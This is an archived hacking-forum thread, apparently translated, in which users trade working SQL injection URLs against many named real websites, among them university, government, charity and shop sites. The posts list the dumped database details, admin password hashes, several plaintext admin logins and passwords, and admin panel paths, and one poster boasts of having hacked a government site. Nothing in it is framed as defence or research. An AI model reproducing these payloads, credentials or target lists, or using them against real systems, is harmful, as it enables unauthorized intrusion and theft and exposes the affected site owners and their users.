SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Chaak

    Dimi4,

    Dumped database.table:
    Code:
    4.1.22-standard:ic_music:ic@localhost
     
    #7021 Chaak, 12 Dec 2008
    Last edited: 12 Dec 2008
    2 people like this.
  2. [х26]VОLАND

    http://www.wbdg.org/ccb/admin/index.php
    But it's kind of broken =/
     
  3. iddqd

    Code:
    http://www.cactuslove.ru/su_big_foto.php?imgid=350'/**/union/**/select/**/1,2,concat_ws(0x3a,login,password,nick),4,5/**/from/**/cactuslove/**/limit/**/1,1/*
    
    Yandex TIC: 1400
    Database: cactuslove
    Version: 5.0.32-Debian_7etch8-log
    User: cactus_user@localhost
     
  4. masternet

    http://www.hasznaltautokereskedok.hu/see.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(char(32,45,32),version(),user(),database()),24,25,26,27,28,29,30,31,32,33--
    5.0.32-Debian_7etch5-log - root@localhost - hauto
    pr- 3
    ---------------------------
    http://www.avaria-auto.ru/see.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    4.1.22-standard-log - avariaau_auto@localhost - avariaau_autolen
    pr - 3
     
    #7024 masternet, 12 Dec 2008
    Last edited: 12 Dec 2008
  5. USAkid

    ChaaK, Dimi4,
    to continue:
    Code:
    http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(user,0x3a,password),2+from+mysql.user+where+user='root'--
    root:*347372949FBE1B252E308137EA426D7307712EC8

    ChaaK, for some reason it couldn't be found back then o_O, but now it's there :)
     
  6. USAkid

    http://www.mojo-jojo.lv
    Code:
    http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+version()--
    5.0.67-log

    lv_users:
    Code:
    http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+table_name+from+information_schema.tables+limit+37,1--
    user_login:user_pass:

    Code:
    http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+concat_ws(user_login,0x3a,user_pass)+from+lv_users--
    admin:817c2f281b767ae9ac524c596a0ee645
     
  7. Thrasher88

    svpressa.ru - online publication
    5.0.51a-log:svpressa@localhost:svpressa

    Admin login and password: em:vue
    Admin panel login: svpressa.ru/adm/
     
  8. masternet

    1. I already posted this SQLi..
    2. though without the admin panel.. better post this in the access section.. not here.. (see point 1)
    --------------------------
    http://www.hiddenmickeysguide.com/catalog.php?id=-1+union+select+concat_ws(char(32,45,32),id,name,email,bio,img,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
    --------------------
    http://www.yusk.ru/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7--
    5.0.30-Debian_1-log - [email protected] - z71348_main
    TIC : 80 PR: 3
    -----------------------
    http://www.mkc-kc.ru/shop/cat.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database())--
    4.1.22-log - mksks@localhost - wwwmksksru
    TIC : 80 PR: 4
    -------------------------
    http://www.monolithstroi.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3--
    5.0.67-percona-b5-log - rkot@localhost - rkot
    ----------------------
    http://www.nzn-msk.ru/cat.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9,10--
    4.0.24 - akrs1@localhost - db_akrs
    TIC : 40 PR: 2
    ----------------
    http://www.antey87.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11--
    4.1.20-lk-log - orionaru_aveo@localhost - orionaru_aveo
    TIC : 10 PR: 4
    -------------------------
    http://www.x-telpro.ru/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2--
    4.0.27 - root@localhost - xtelpro_xtelprodb
    TIC : 60 PR: 4
    -------------------
    http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())--
    5.0.51a-log - [email protected] - ukrfoto_db
    TIC : 30 PR: 3
    http://www.maginfo.com.ua/cat.php?id=-1+union+select+unhex(hex(group_concat(column_name)))+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273--
    id,user_name,user_password
    http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat(id,0x3a,user_name,0x3a,user_password)+from+administrators--
    and here it doesn't output anything for some reason(
    probably because those values aren't there.. since the admin panel login there goes through the hosting rather than through the site(
    ---------------------
    http://www.arka-hitech.com.ua/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    4.1.22 - arka-hitech@localhost - arka_hitech
    TIC : 20 PR: 3
    -----------------
    http://foto.pokupaem.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2--
    5.0.51a-log - [email protected] - ukrfoto_db
    PR: 1
    --------------
    http://www.riak.lg.ua/pagegen.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4--
    5.1.15-beta-log - linksuser@localhost - links
    TIC : 70 PR: 4
    ----------------
    http://www.dominican.edu/query/ncur/display_ncur.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(char(32,45,32),version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118--
    5.0.26-LOG - DUOC_ONLINE@NACIO1 - DOMINICAN
    TIC : 70 PR: 6
    ----------------------
    http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9--
    4.1.12-log - paw@localhost - paw
    TIC : 60
    ----------------------
    http://www.inst.msstate.edu/print_page.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9--
    4.1.22-log - inst_site@localhost - inst_frontend
    PR: 5
    -------------------
    http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7,8,9,10,11--
    4.1.22-standard-log - opednews_vidya@localhost - opednews_pearl
    TIC : 220 PR: 6
    ------------------
    http://www.faoswalim.org/resource_center/geonetwork/link.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    4.1.22-standard - faoswa_new@localhost - faoswa_new
    PR: 5
    -------------
     
    #7028 masternet, 13 Dec 2008
    Last edited: 13 Dec 2008
    1 person likes this.
  9. SHS

    http://www.villaclick.com/search/availabilitymail.asp?ID=-1+union+select+top+1+username%2bchar(0x7e)%2bpassword,222,333+from+Operators--
    http://www.villaclick.com/admin/
     
  10. masternet

    del..
     
  11. Thrasher88

    www.peoples.ru - a major online publication
    Version: 5.0.45-log
    USER: [email protected]
    Database: peoplesru
     
  12. masternet

    https://secure1.ilisys.com.au/great/order.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6--
    4.1.21-standard-log - [email protected] - great_db
    ------------------
    http://www.navimeteo.eu/order.php?ID=-1+union+select+1,concat_ws(char(32,45,32),Username,Password,testoMail,refMail,mail2,contratto,contratto_eng,contratto_ita,allegato_eng,allegato_ita,brochure_ita,brochure_eng,last_access,last_ip),3,4,5,6+from+nav_settings--
    http://www.navimeteo.eu/admin nav0609:rfz278hj
    -------------------------
    http://www.artworksisrael.com/order.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32),version(),user(),database()),7,8,9,10,11,12,13,14,15--
    5.0.32-Debian_7etch8-log - aistore@localhost - aistore
    ----------------
    http://zhdkrecords.zhdk.ch/order.php?ID=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6--
    5.0.32-Debian_7etch6-log - hmtzrecords@localhost - hmtzrecords
    -------------------
    http://dtv.horizont.by/index.php?id=news&n=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5--
    4.1.22-standard - dtvhori_user@localhost - dtvhori_dtvdb
    -----------------------
    http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.22-log - viz_php@localhost - sioviz
    PR: 6
    ---------------
    http://www.lrdc.pitt.edu/people/person-detail.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2,3,4--
    4.1.22-log - [email protected] - lrdc-site
    TIC : 10 PR: 6
    -----------------------
    http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32,45,32),user_id,user_name,user_login,user_password,user_level))),6,7+from+users+limit+0,1--
    http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32,45,32),user_id,user_name,user_login,user_password,user_level))),6,7+from+users+limit+1,1--
    http://www.magindustries.com/admin
    http://www.magindustries.com/cpanel
    can't connect to the admin panels(
    http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6,7--
    5.0.67-community - magind_dbguy@localhost - magind_main
    --------------------
    http://www.nwce.gov.uk/view_event.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    4.1.22-standard-log - nwce@localhost - nwce
    --------------------
    http://www.bbaa.org.uk/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database())--
    5.0.67-log - bbaa@localhost - bbaa
    PR - 6
    ------------------------
    http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13--
    4.0.27-standard-log - [email protected] - db120565932
    TIC - 30
    ------------------
    http://www.norwichplayhouse.org.uk/viewshowdetail.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
    4.0.23-standard - norwichp@localhost - norwichp_play
    PR - 5
    -----------------
    http://www.worksmart.org.uk/jargonbuster/index.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2--
    4.1.20 - worksmart@localhost - tuc
    TIC : 70 PR: 6
    ----------------
    http://www.monitor-nhsft.gov.uk/publications.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(%20),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    5.0.54 - monitor@localhost - nhsftreg
    TIC : 10 PR: 5
    ----------------
    http://old.cs.ncl.ac.uk/people/home.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
    5.0.45 - csReader@localhost - CompSci
    PR: 4
    ---------------------------
    http://www.gower-boat-trips.co.uk/home.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12--
    4.1.22-STANDARD - GOWER_ADVENTURER@LOCALHOST - GOWER_COAST
    --------------------
     
    #7032 masternet, 13 Dec 2008
    Last edited: 14 Dec 2008
    1 person likes this.
  13. d1aVOL

    http://www.ansti.org/order.php?id=-1+union+select+1,2--
    4.1.22-standard
    ansti@localhost
    ansti_anstiorg
     
    1 person likes this.
  14. masternet

    http://www.genetics.wisc.edu/faculty/profile.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())--
    5.0.26-log — [email protected] — registry
    TIC : 40 PR: 7
    -----------------
    http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    4.0.20-debug-debug - smit
    TIC : 50 PR: 5
    -------------------
     
  15. buxhost

    http://goodbux.buxhost.ru/login.php?'
    Is there an injection here, and if so, how can it be exploited?
    :::::::::: tables found ::::::::::::
    * tb_ads
    * tb_ads_categories
    * tb_advertisers
    * tb_buyref
    * tb_cheaters
    * tb_checkfaq
    * tb_clickpack
    * tb_config
    * tb_contact
    * tb_history
    * tb_messenger
    * tb_payme
    * tb_refset
    * tb_site
    * tb_upgrade
    * tb_users
    * users_online
     
  16. ThreeD

    DE shops

    www.salesafter.de

    4.0.27-max-log::db103929080
    ______________________________

    www.schuetzenbund.de

    admin::sh00ting

    5.0.32-Debian_7etch8-log
     
    #7036 ThreeD, 14 Dec 2008
    Last edited: 14 Dec 2008
    1 person likes this.
  17. Cennarios

    http://www.chiapas.gob.mx/funcionarios/listado-servidores-entidad.php?id=-1+union+select+concat_ws(0x3a3a,usuario,password,database()),2,3,4,5,6,7,8,9,10,11,12+from+usuarios+limit+0,1/*

    login: jlmorales
    pass: mo222530


    http://www.chiapas.gob.mx/admin/


    HACKED )))
     
    2 people like this.
  18. masternet

    http://www.aupe.org/in_the_news/news.php?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin--
    KJa6hDJQyb
    couldn't find the login
    4.0.18
     
    1 person likes this.
  19. F4R

    guys, help please)
    I even went through up to 35) it just won't match.. what do I do?
     
    1 person likes this.
  20. Kakoytoxaker

    http://www.bastion-vlg.ru/ask/?id=1+union+select+1,2,3,4,5,6,7,8,version()+--+

    PS Next time, questions go in the neighboring thread, please
     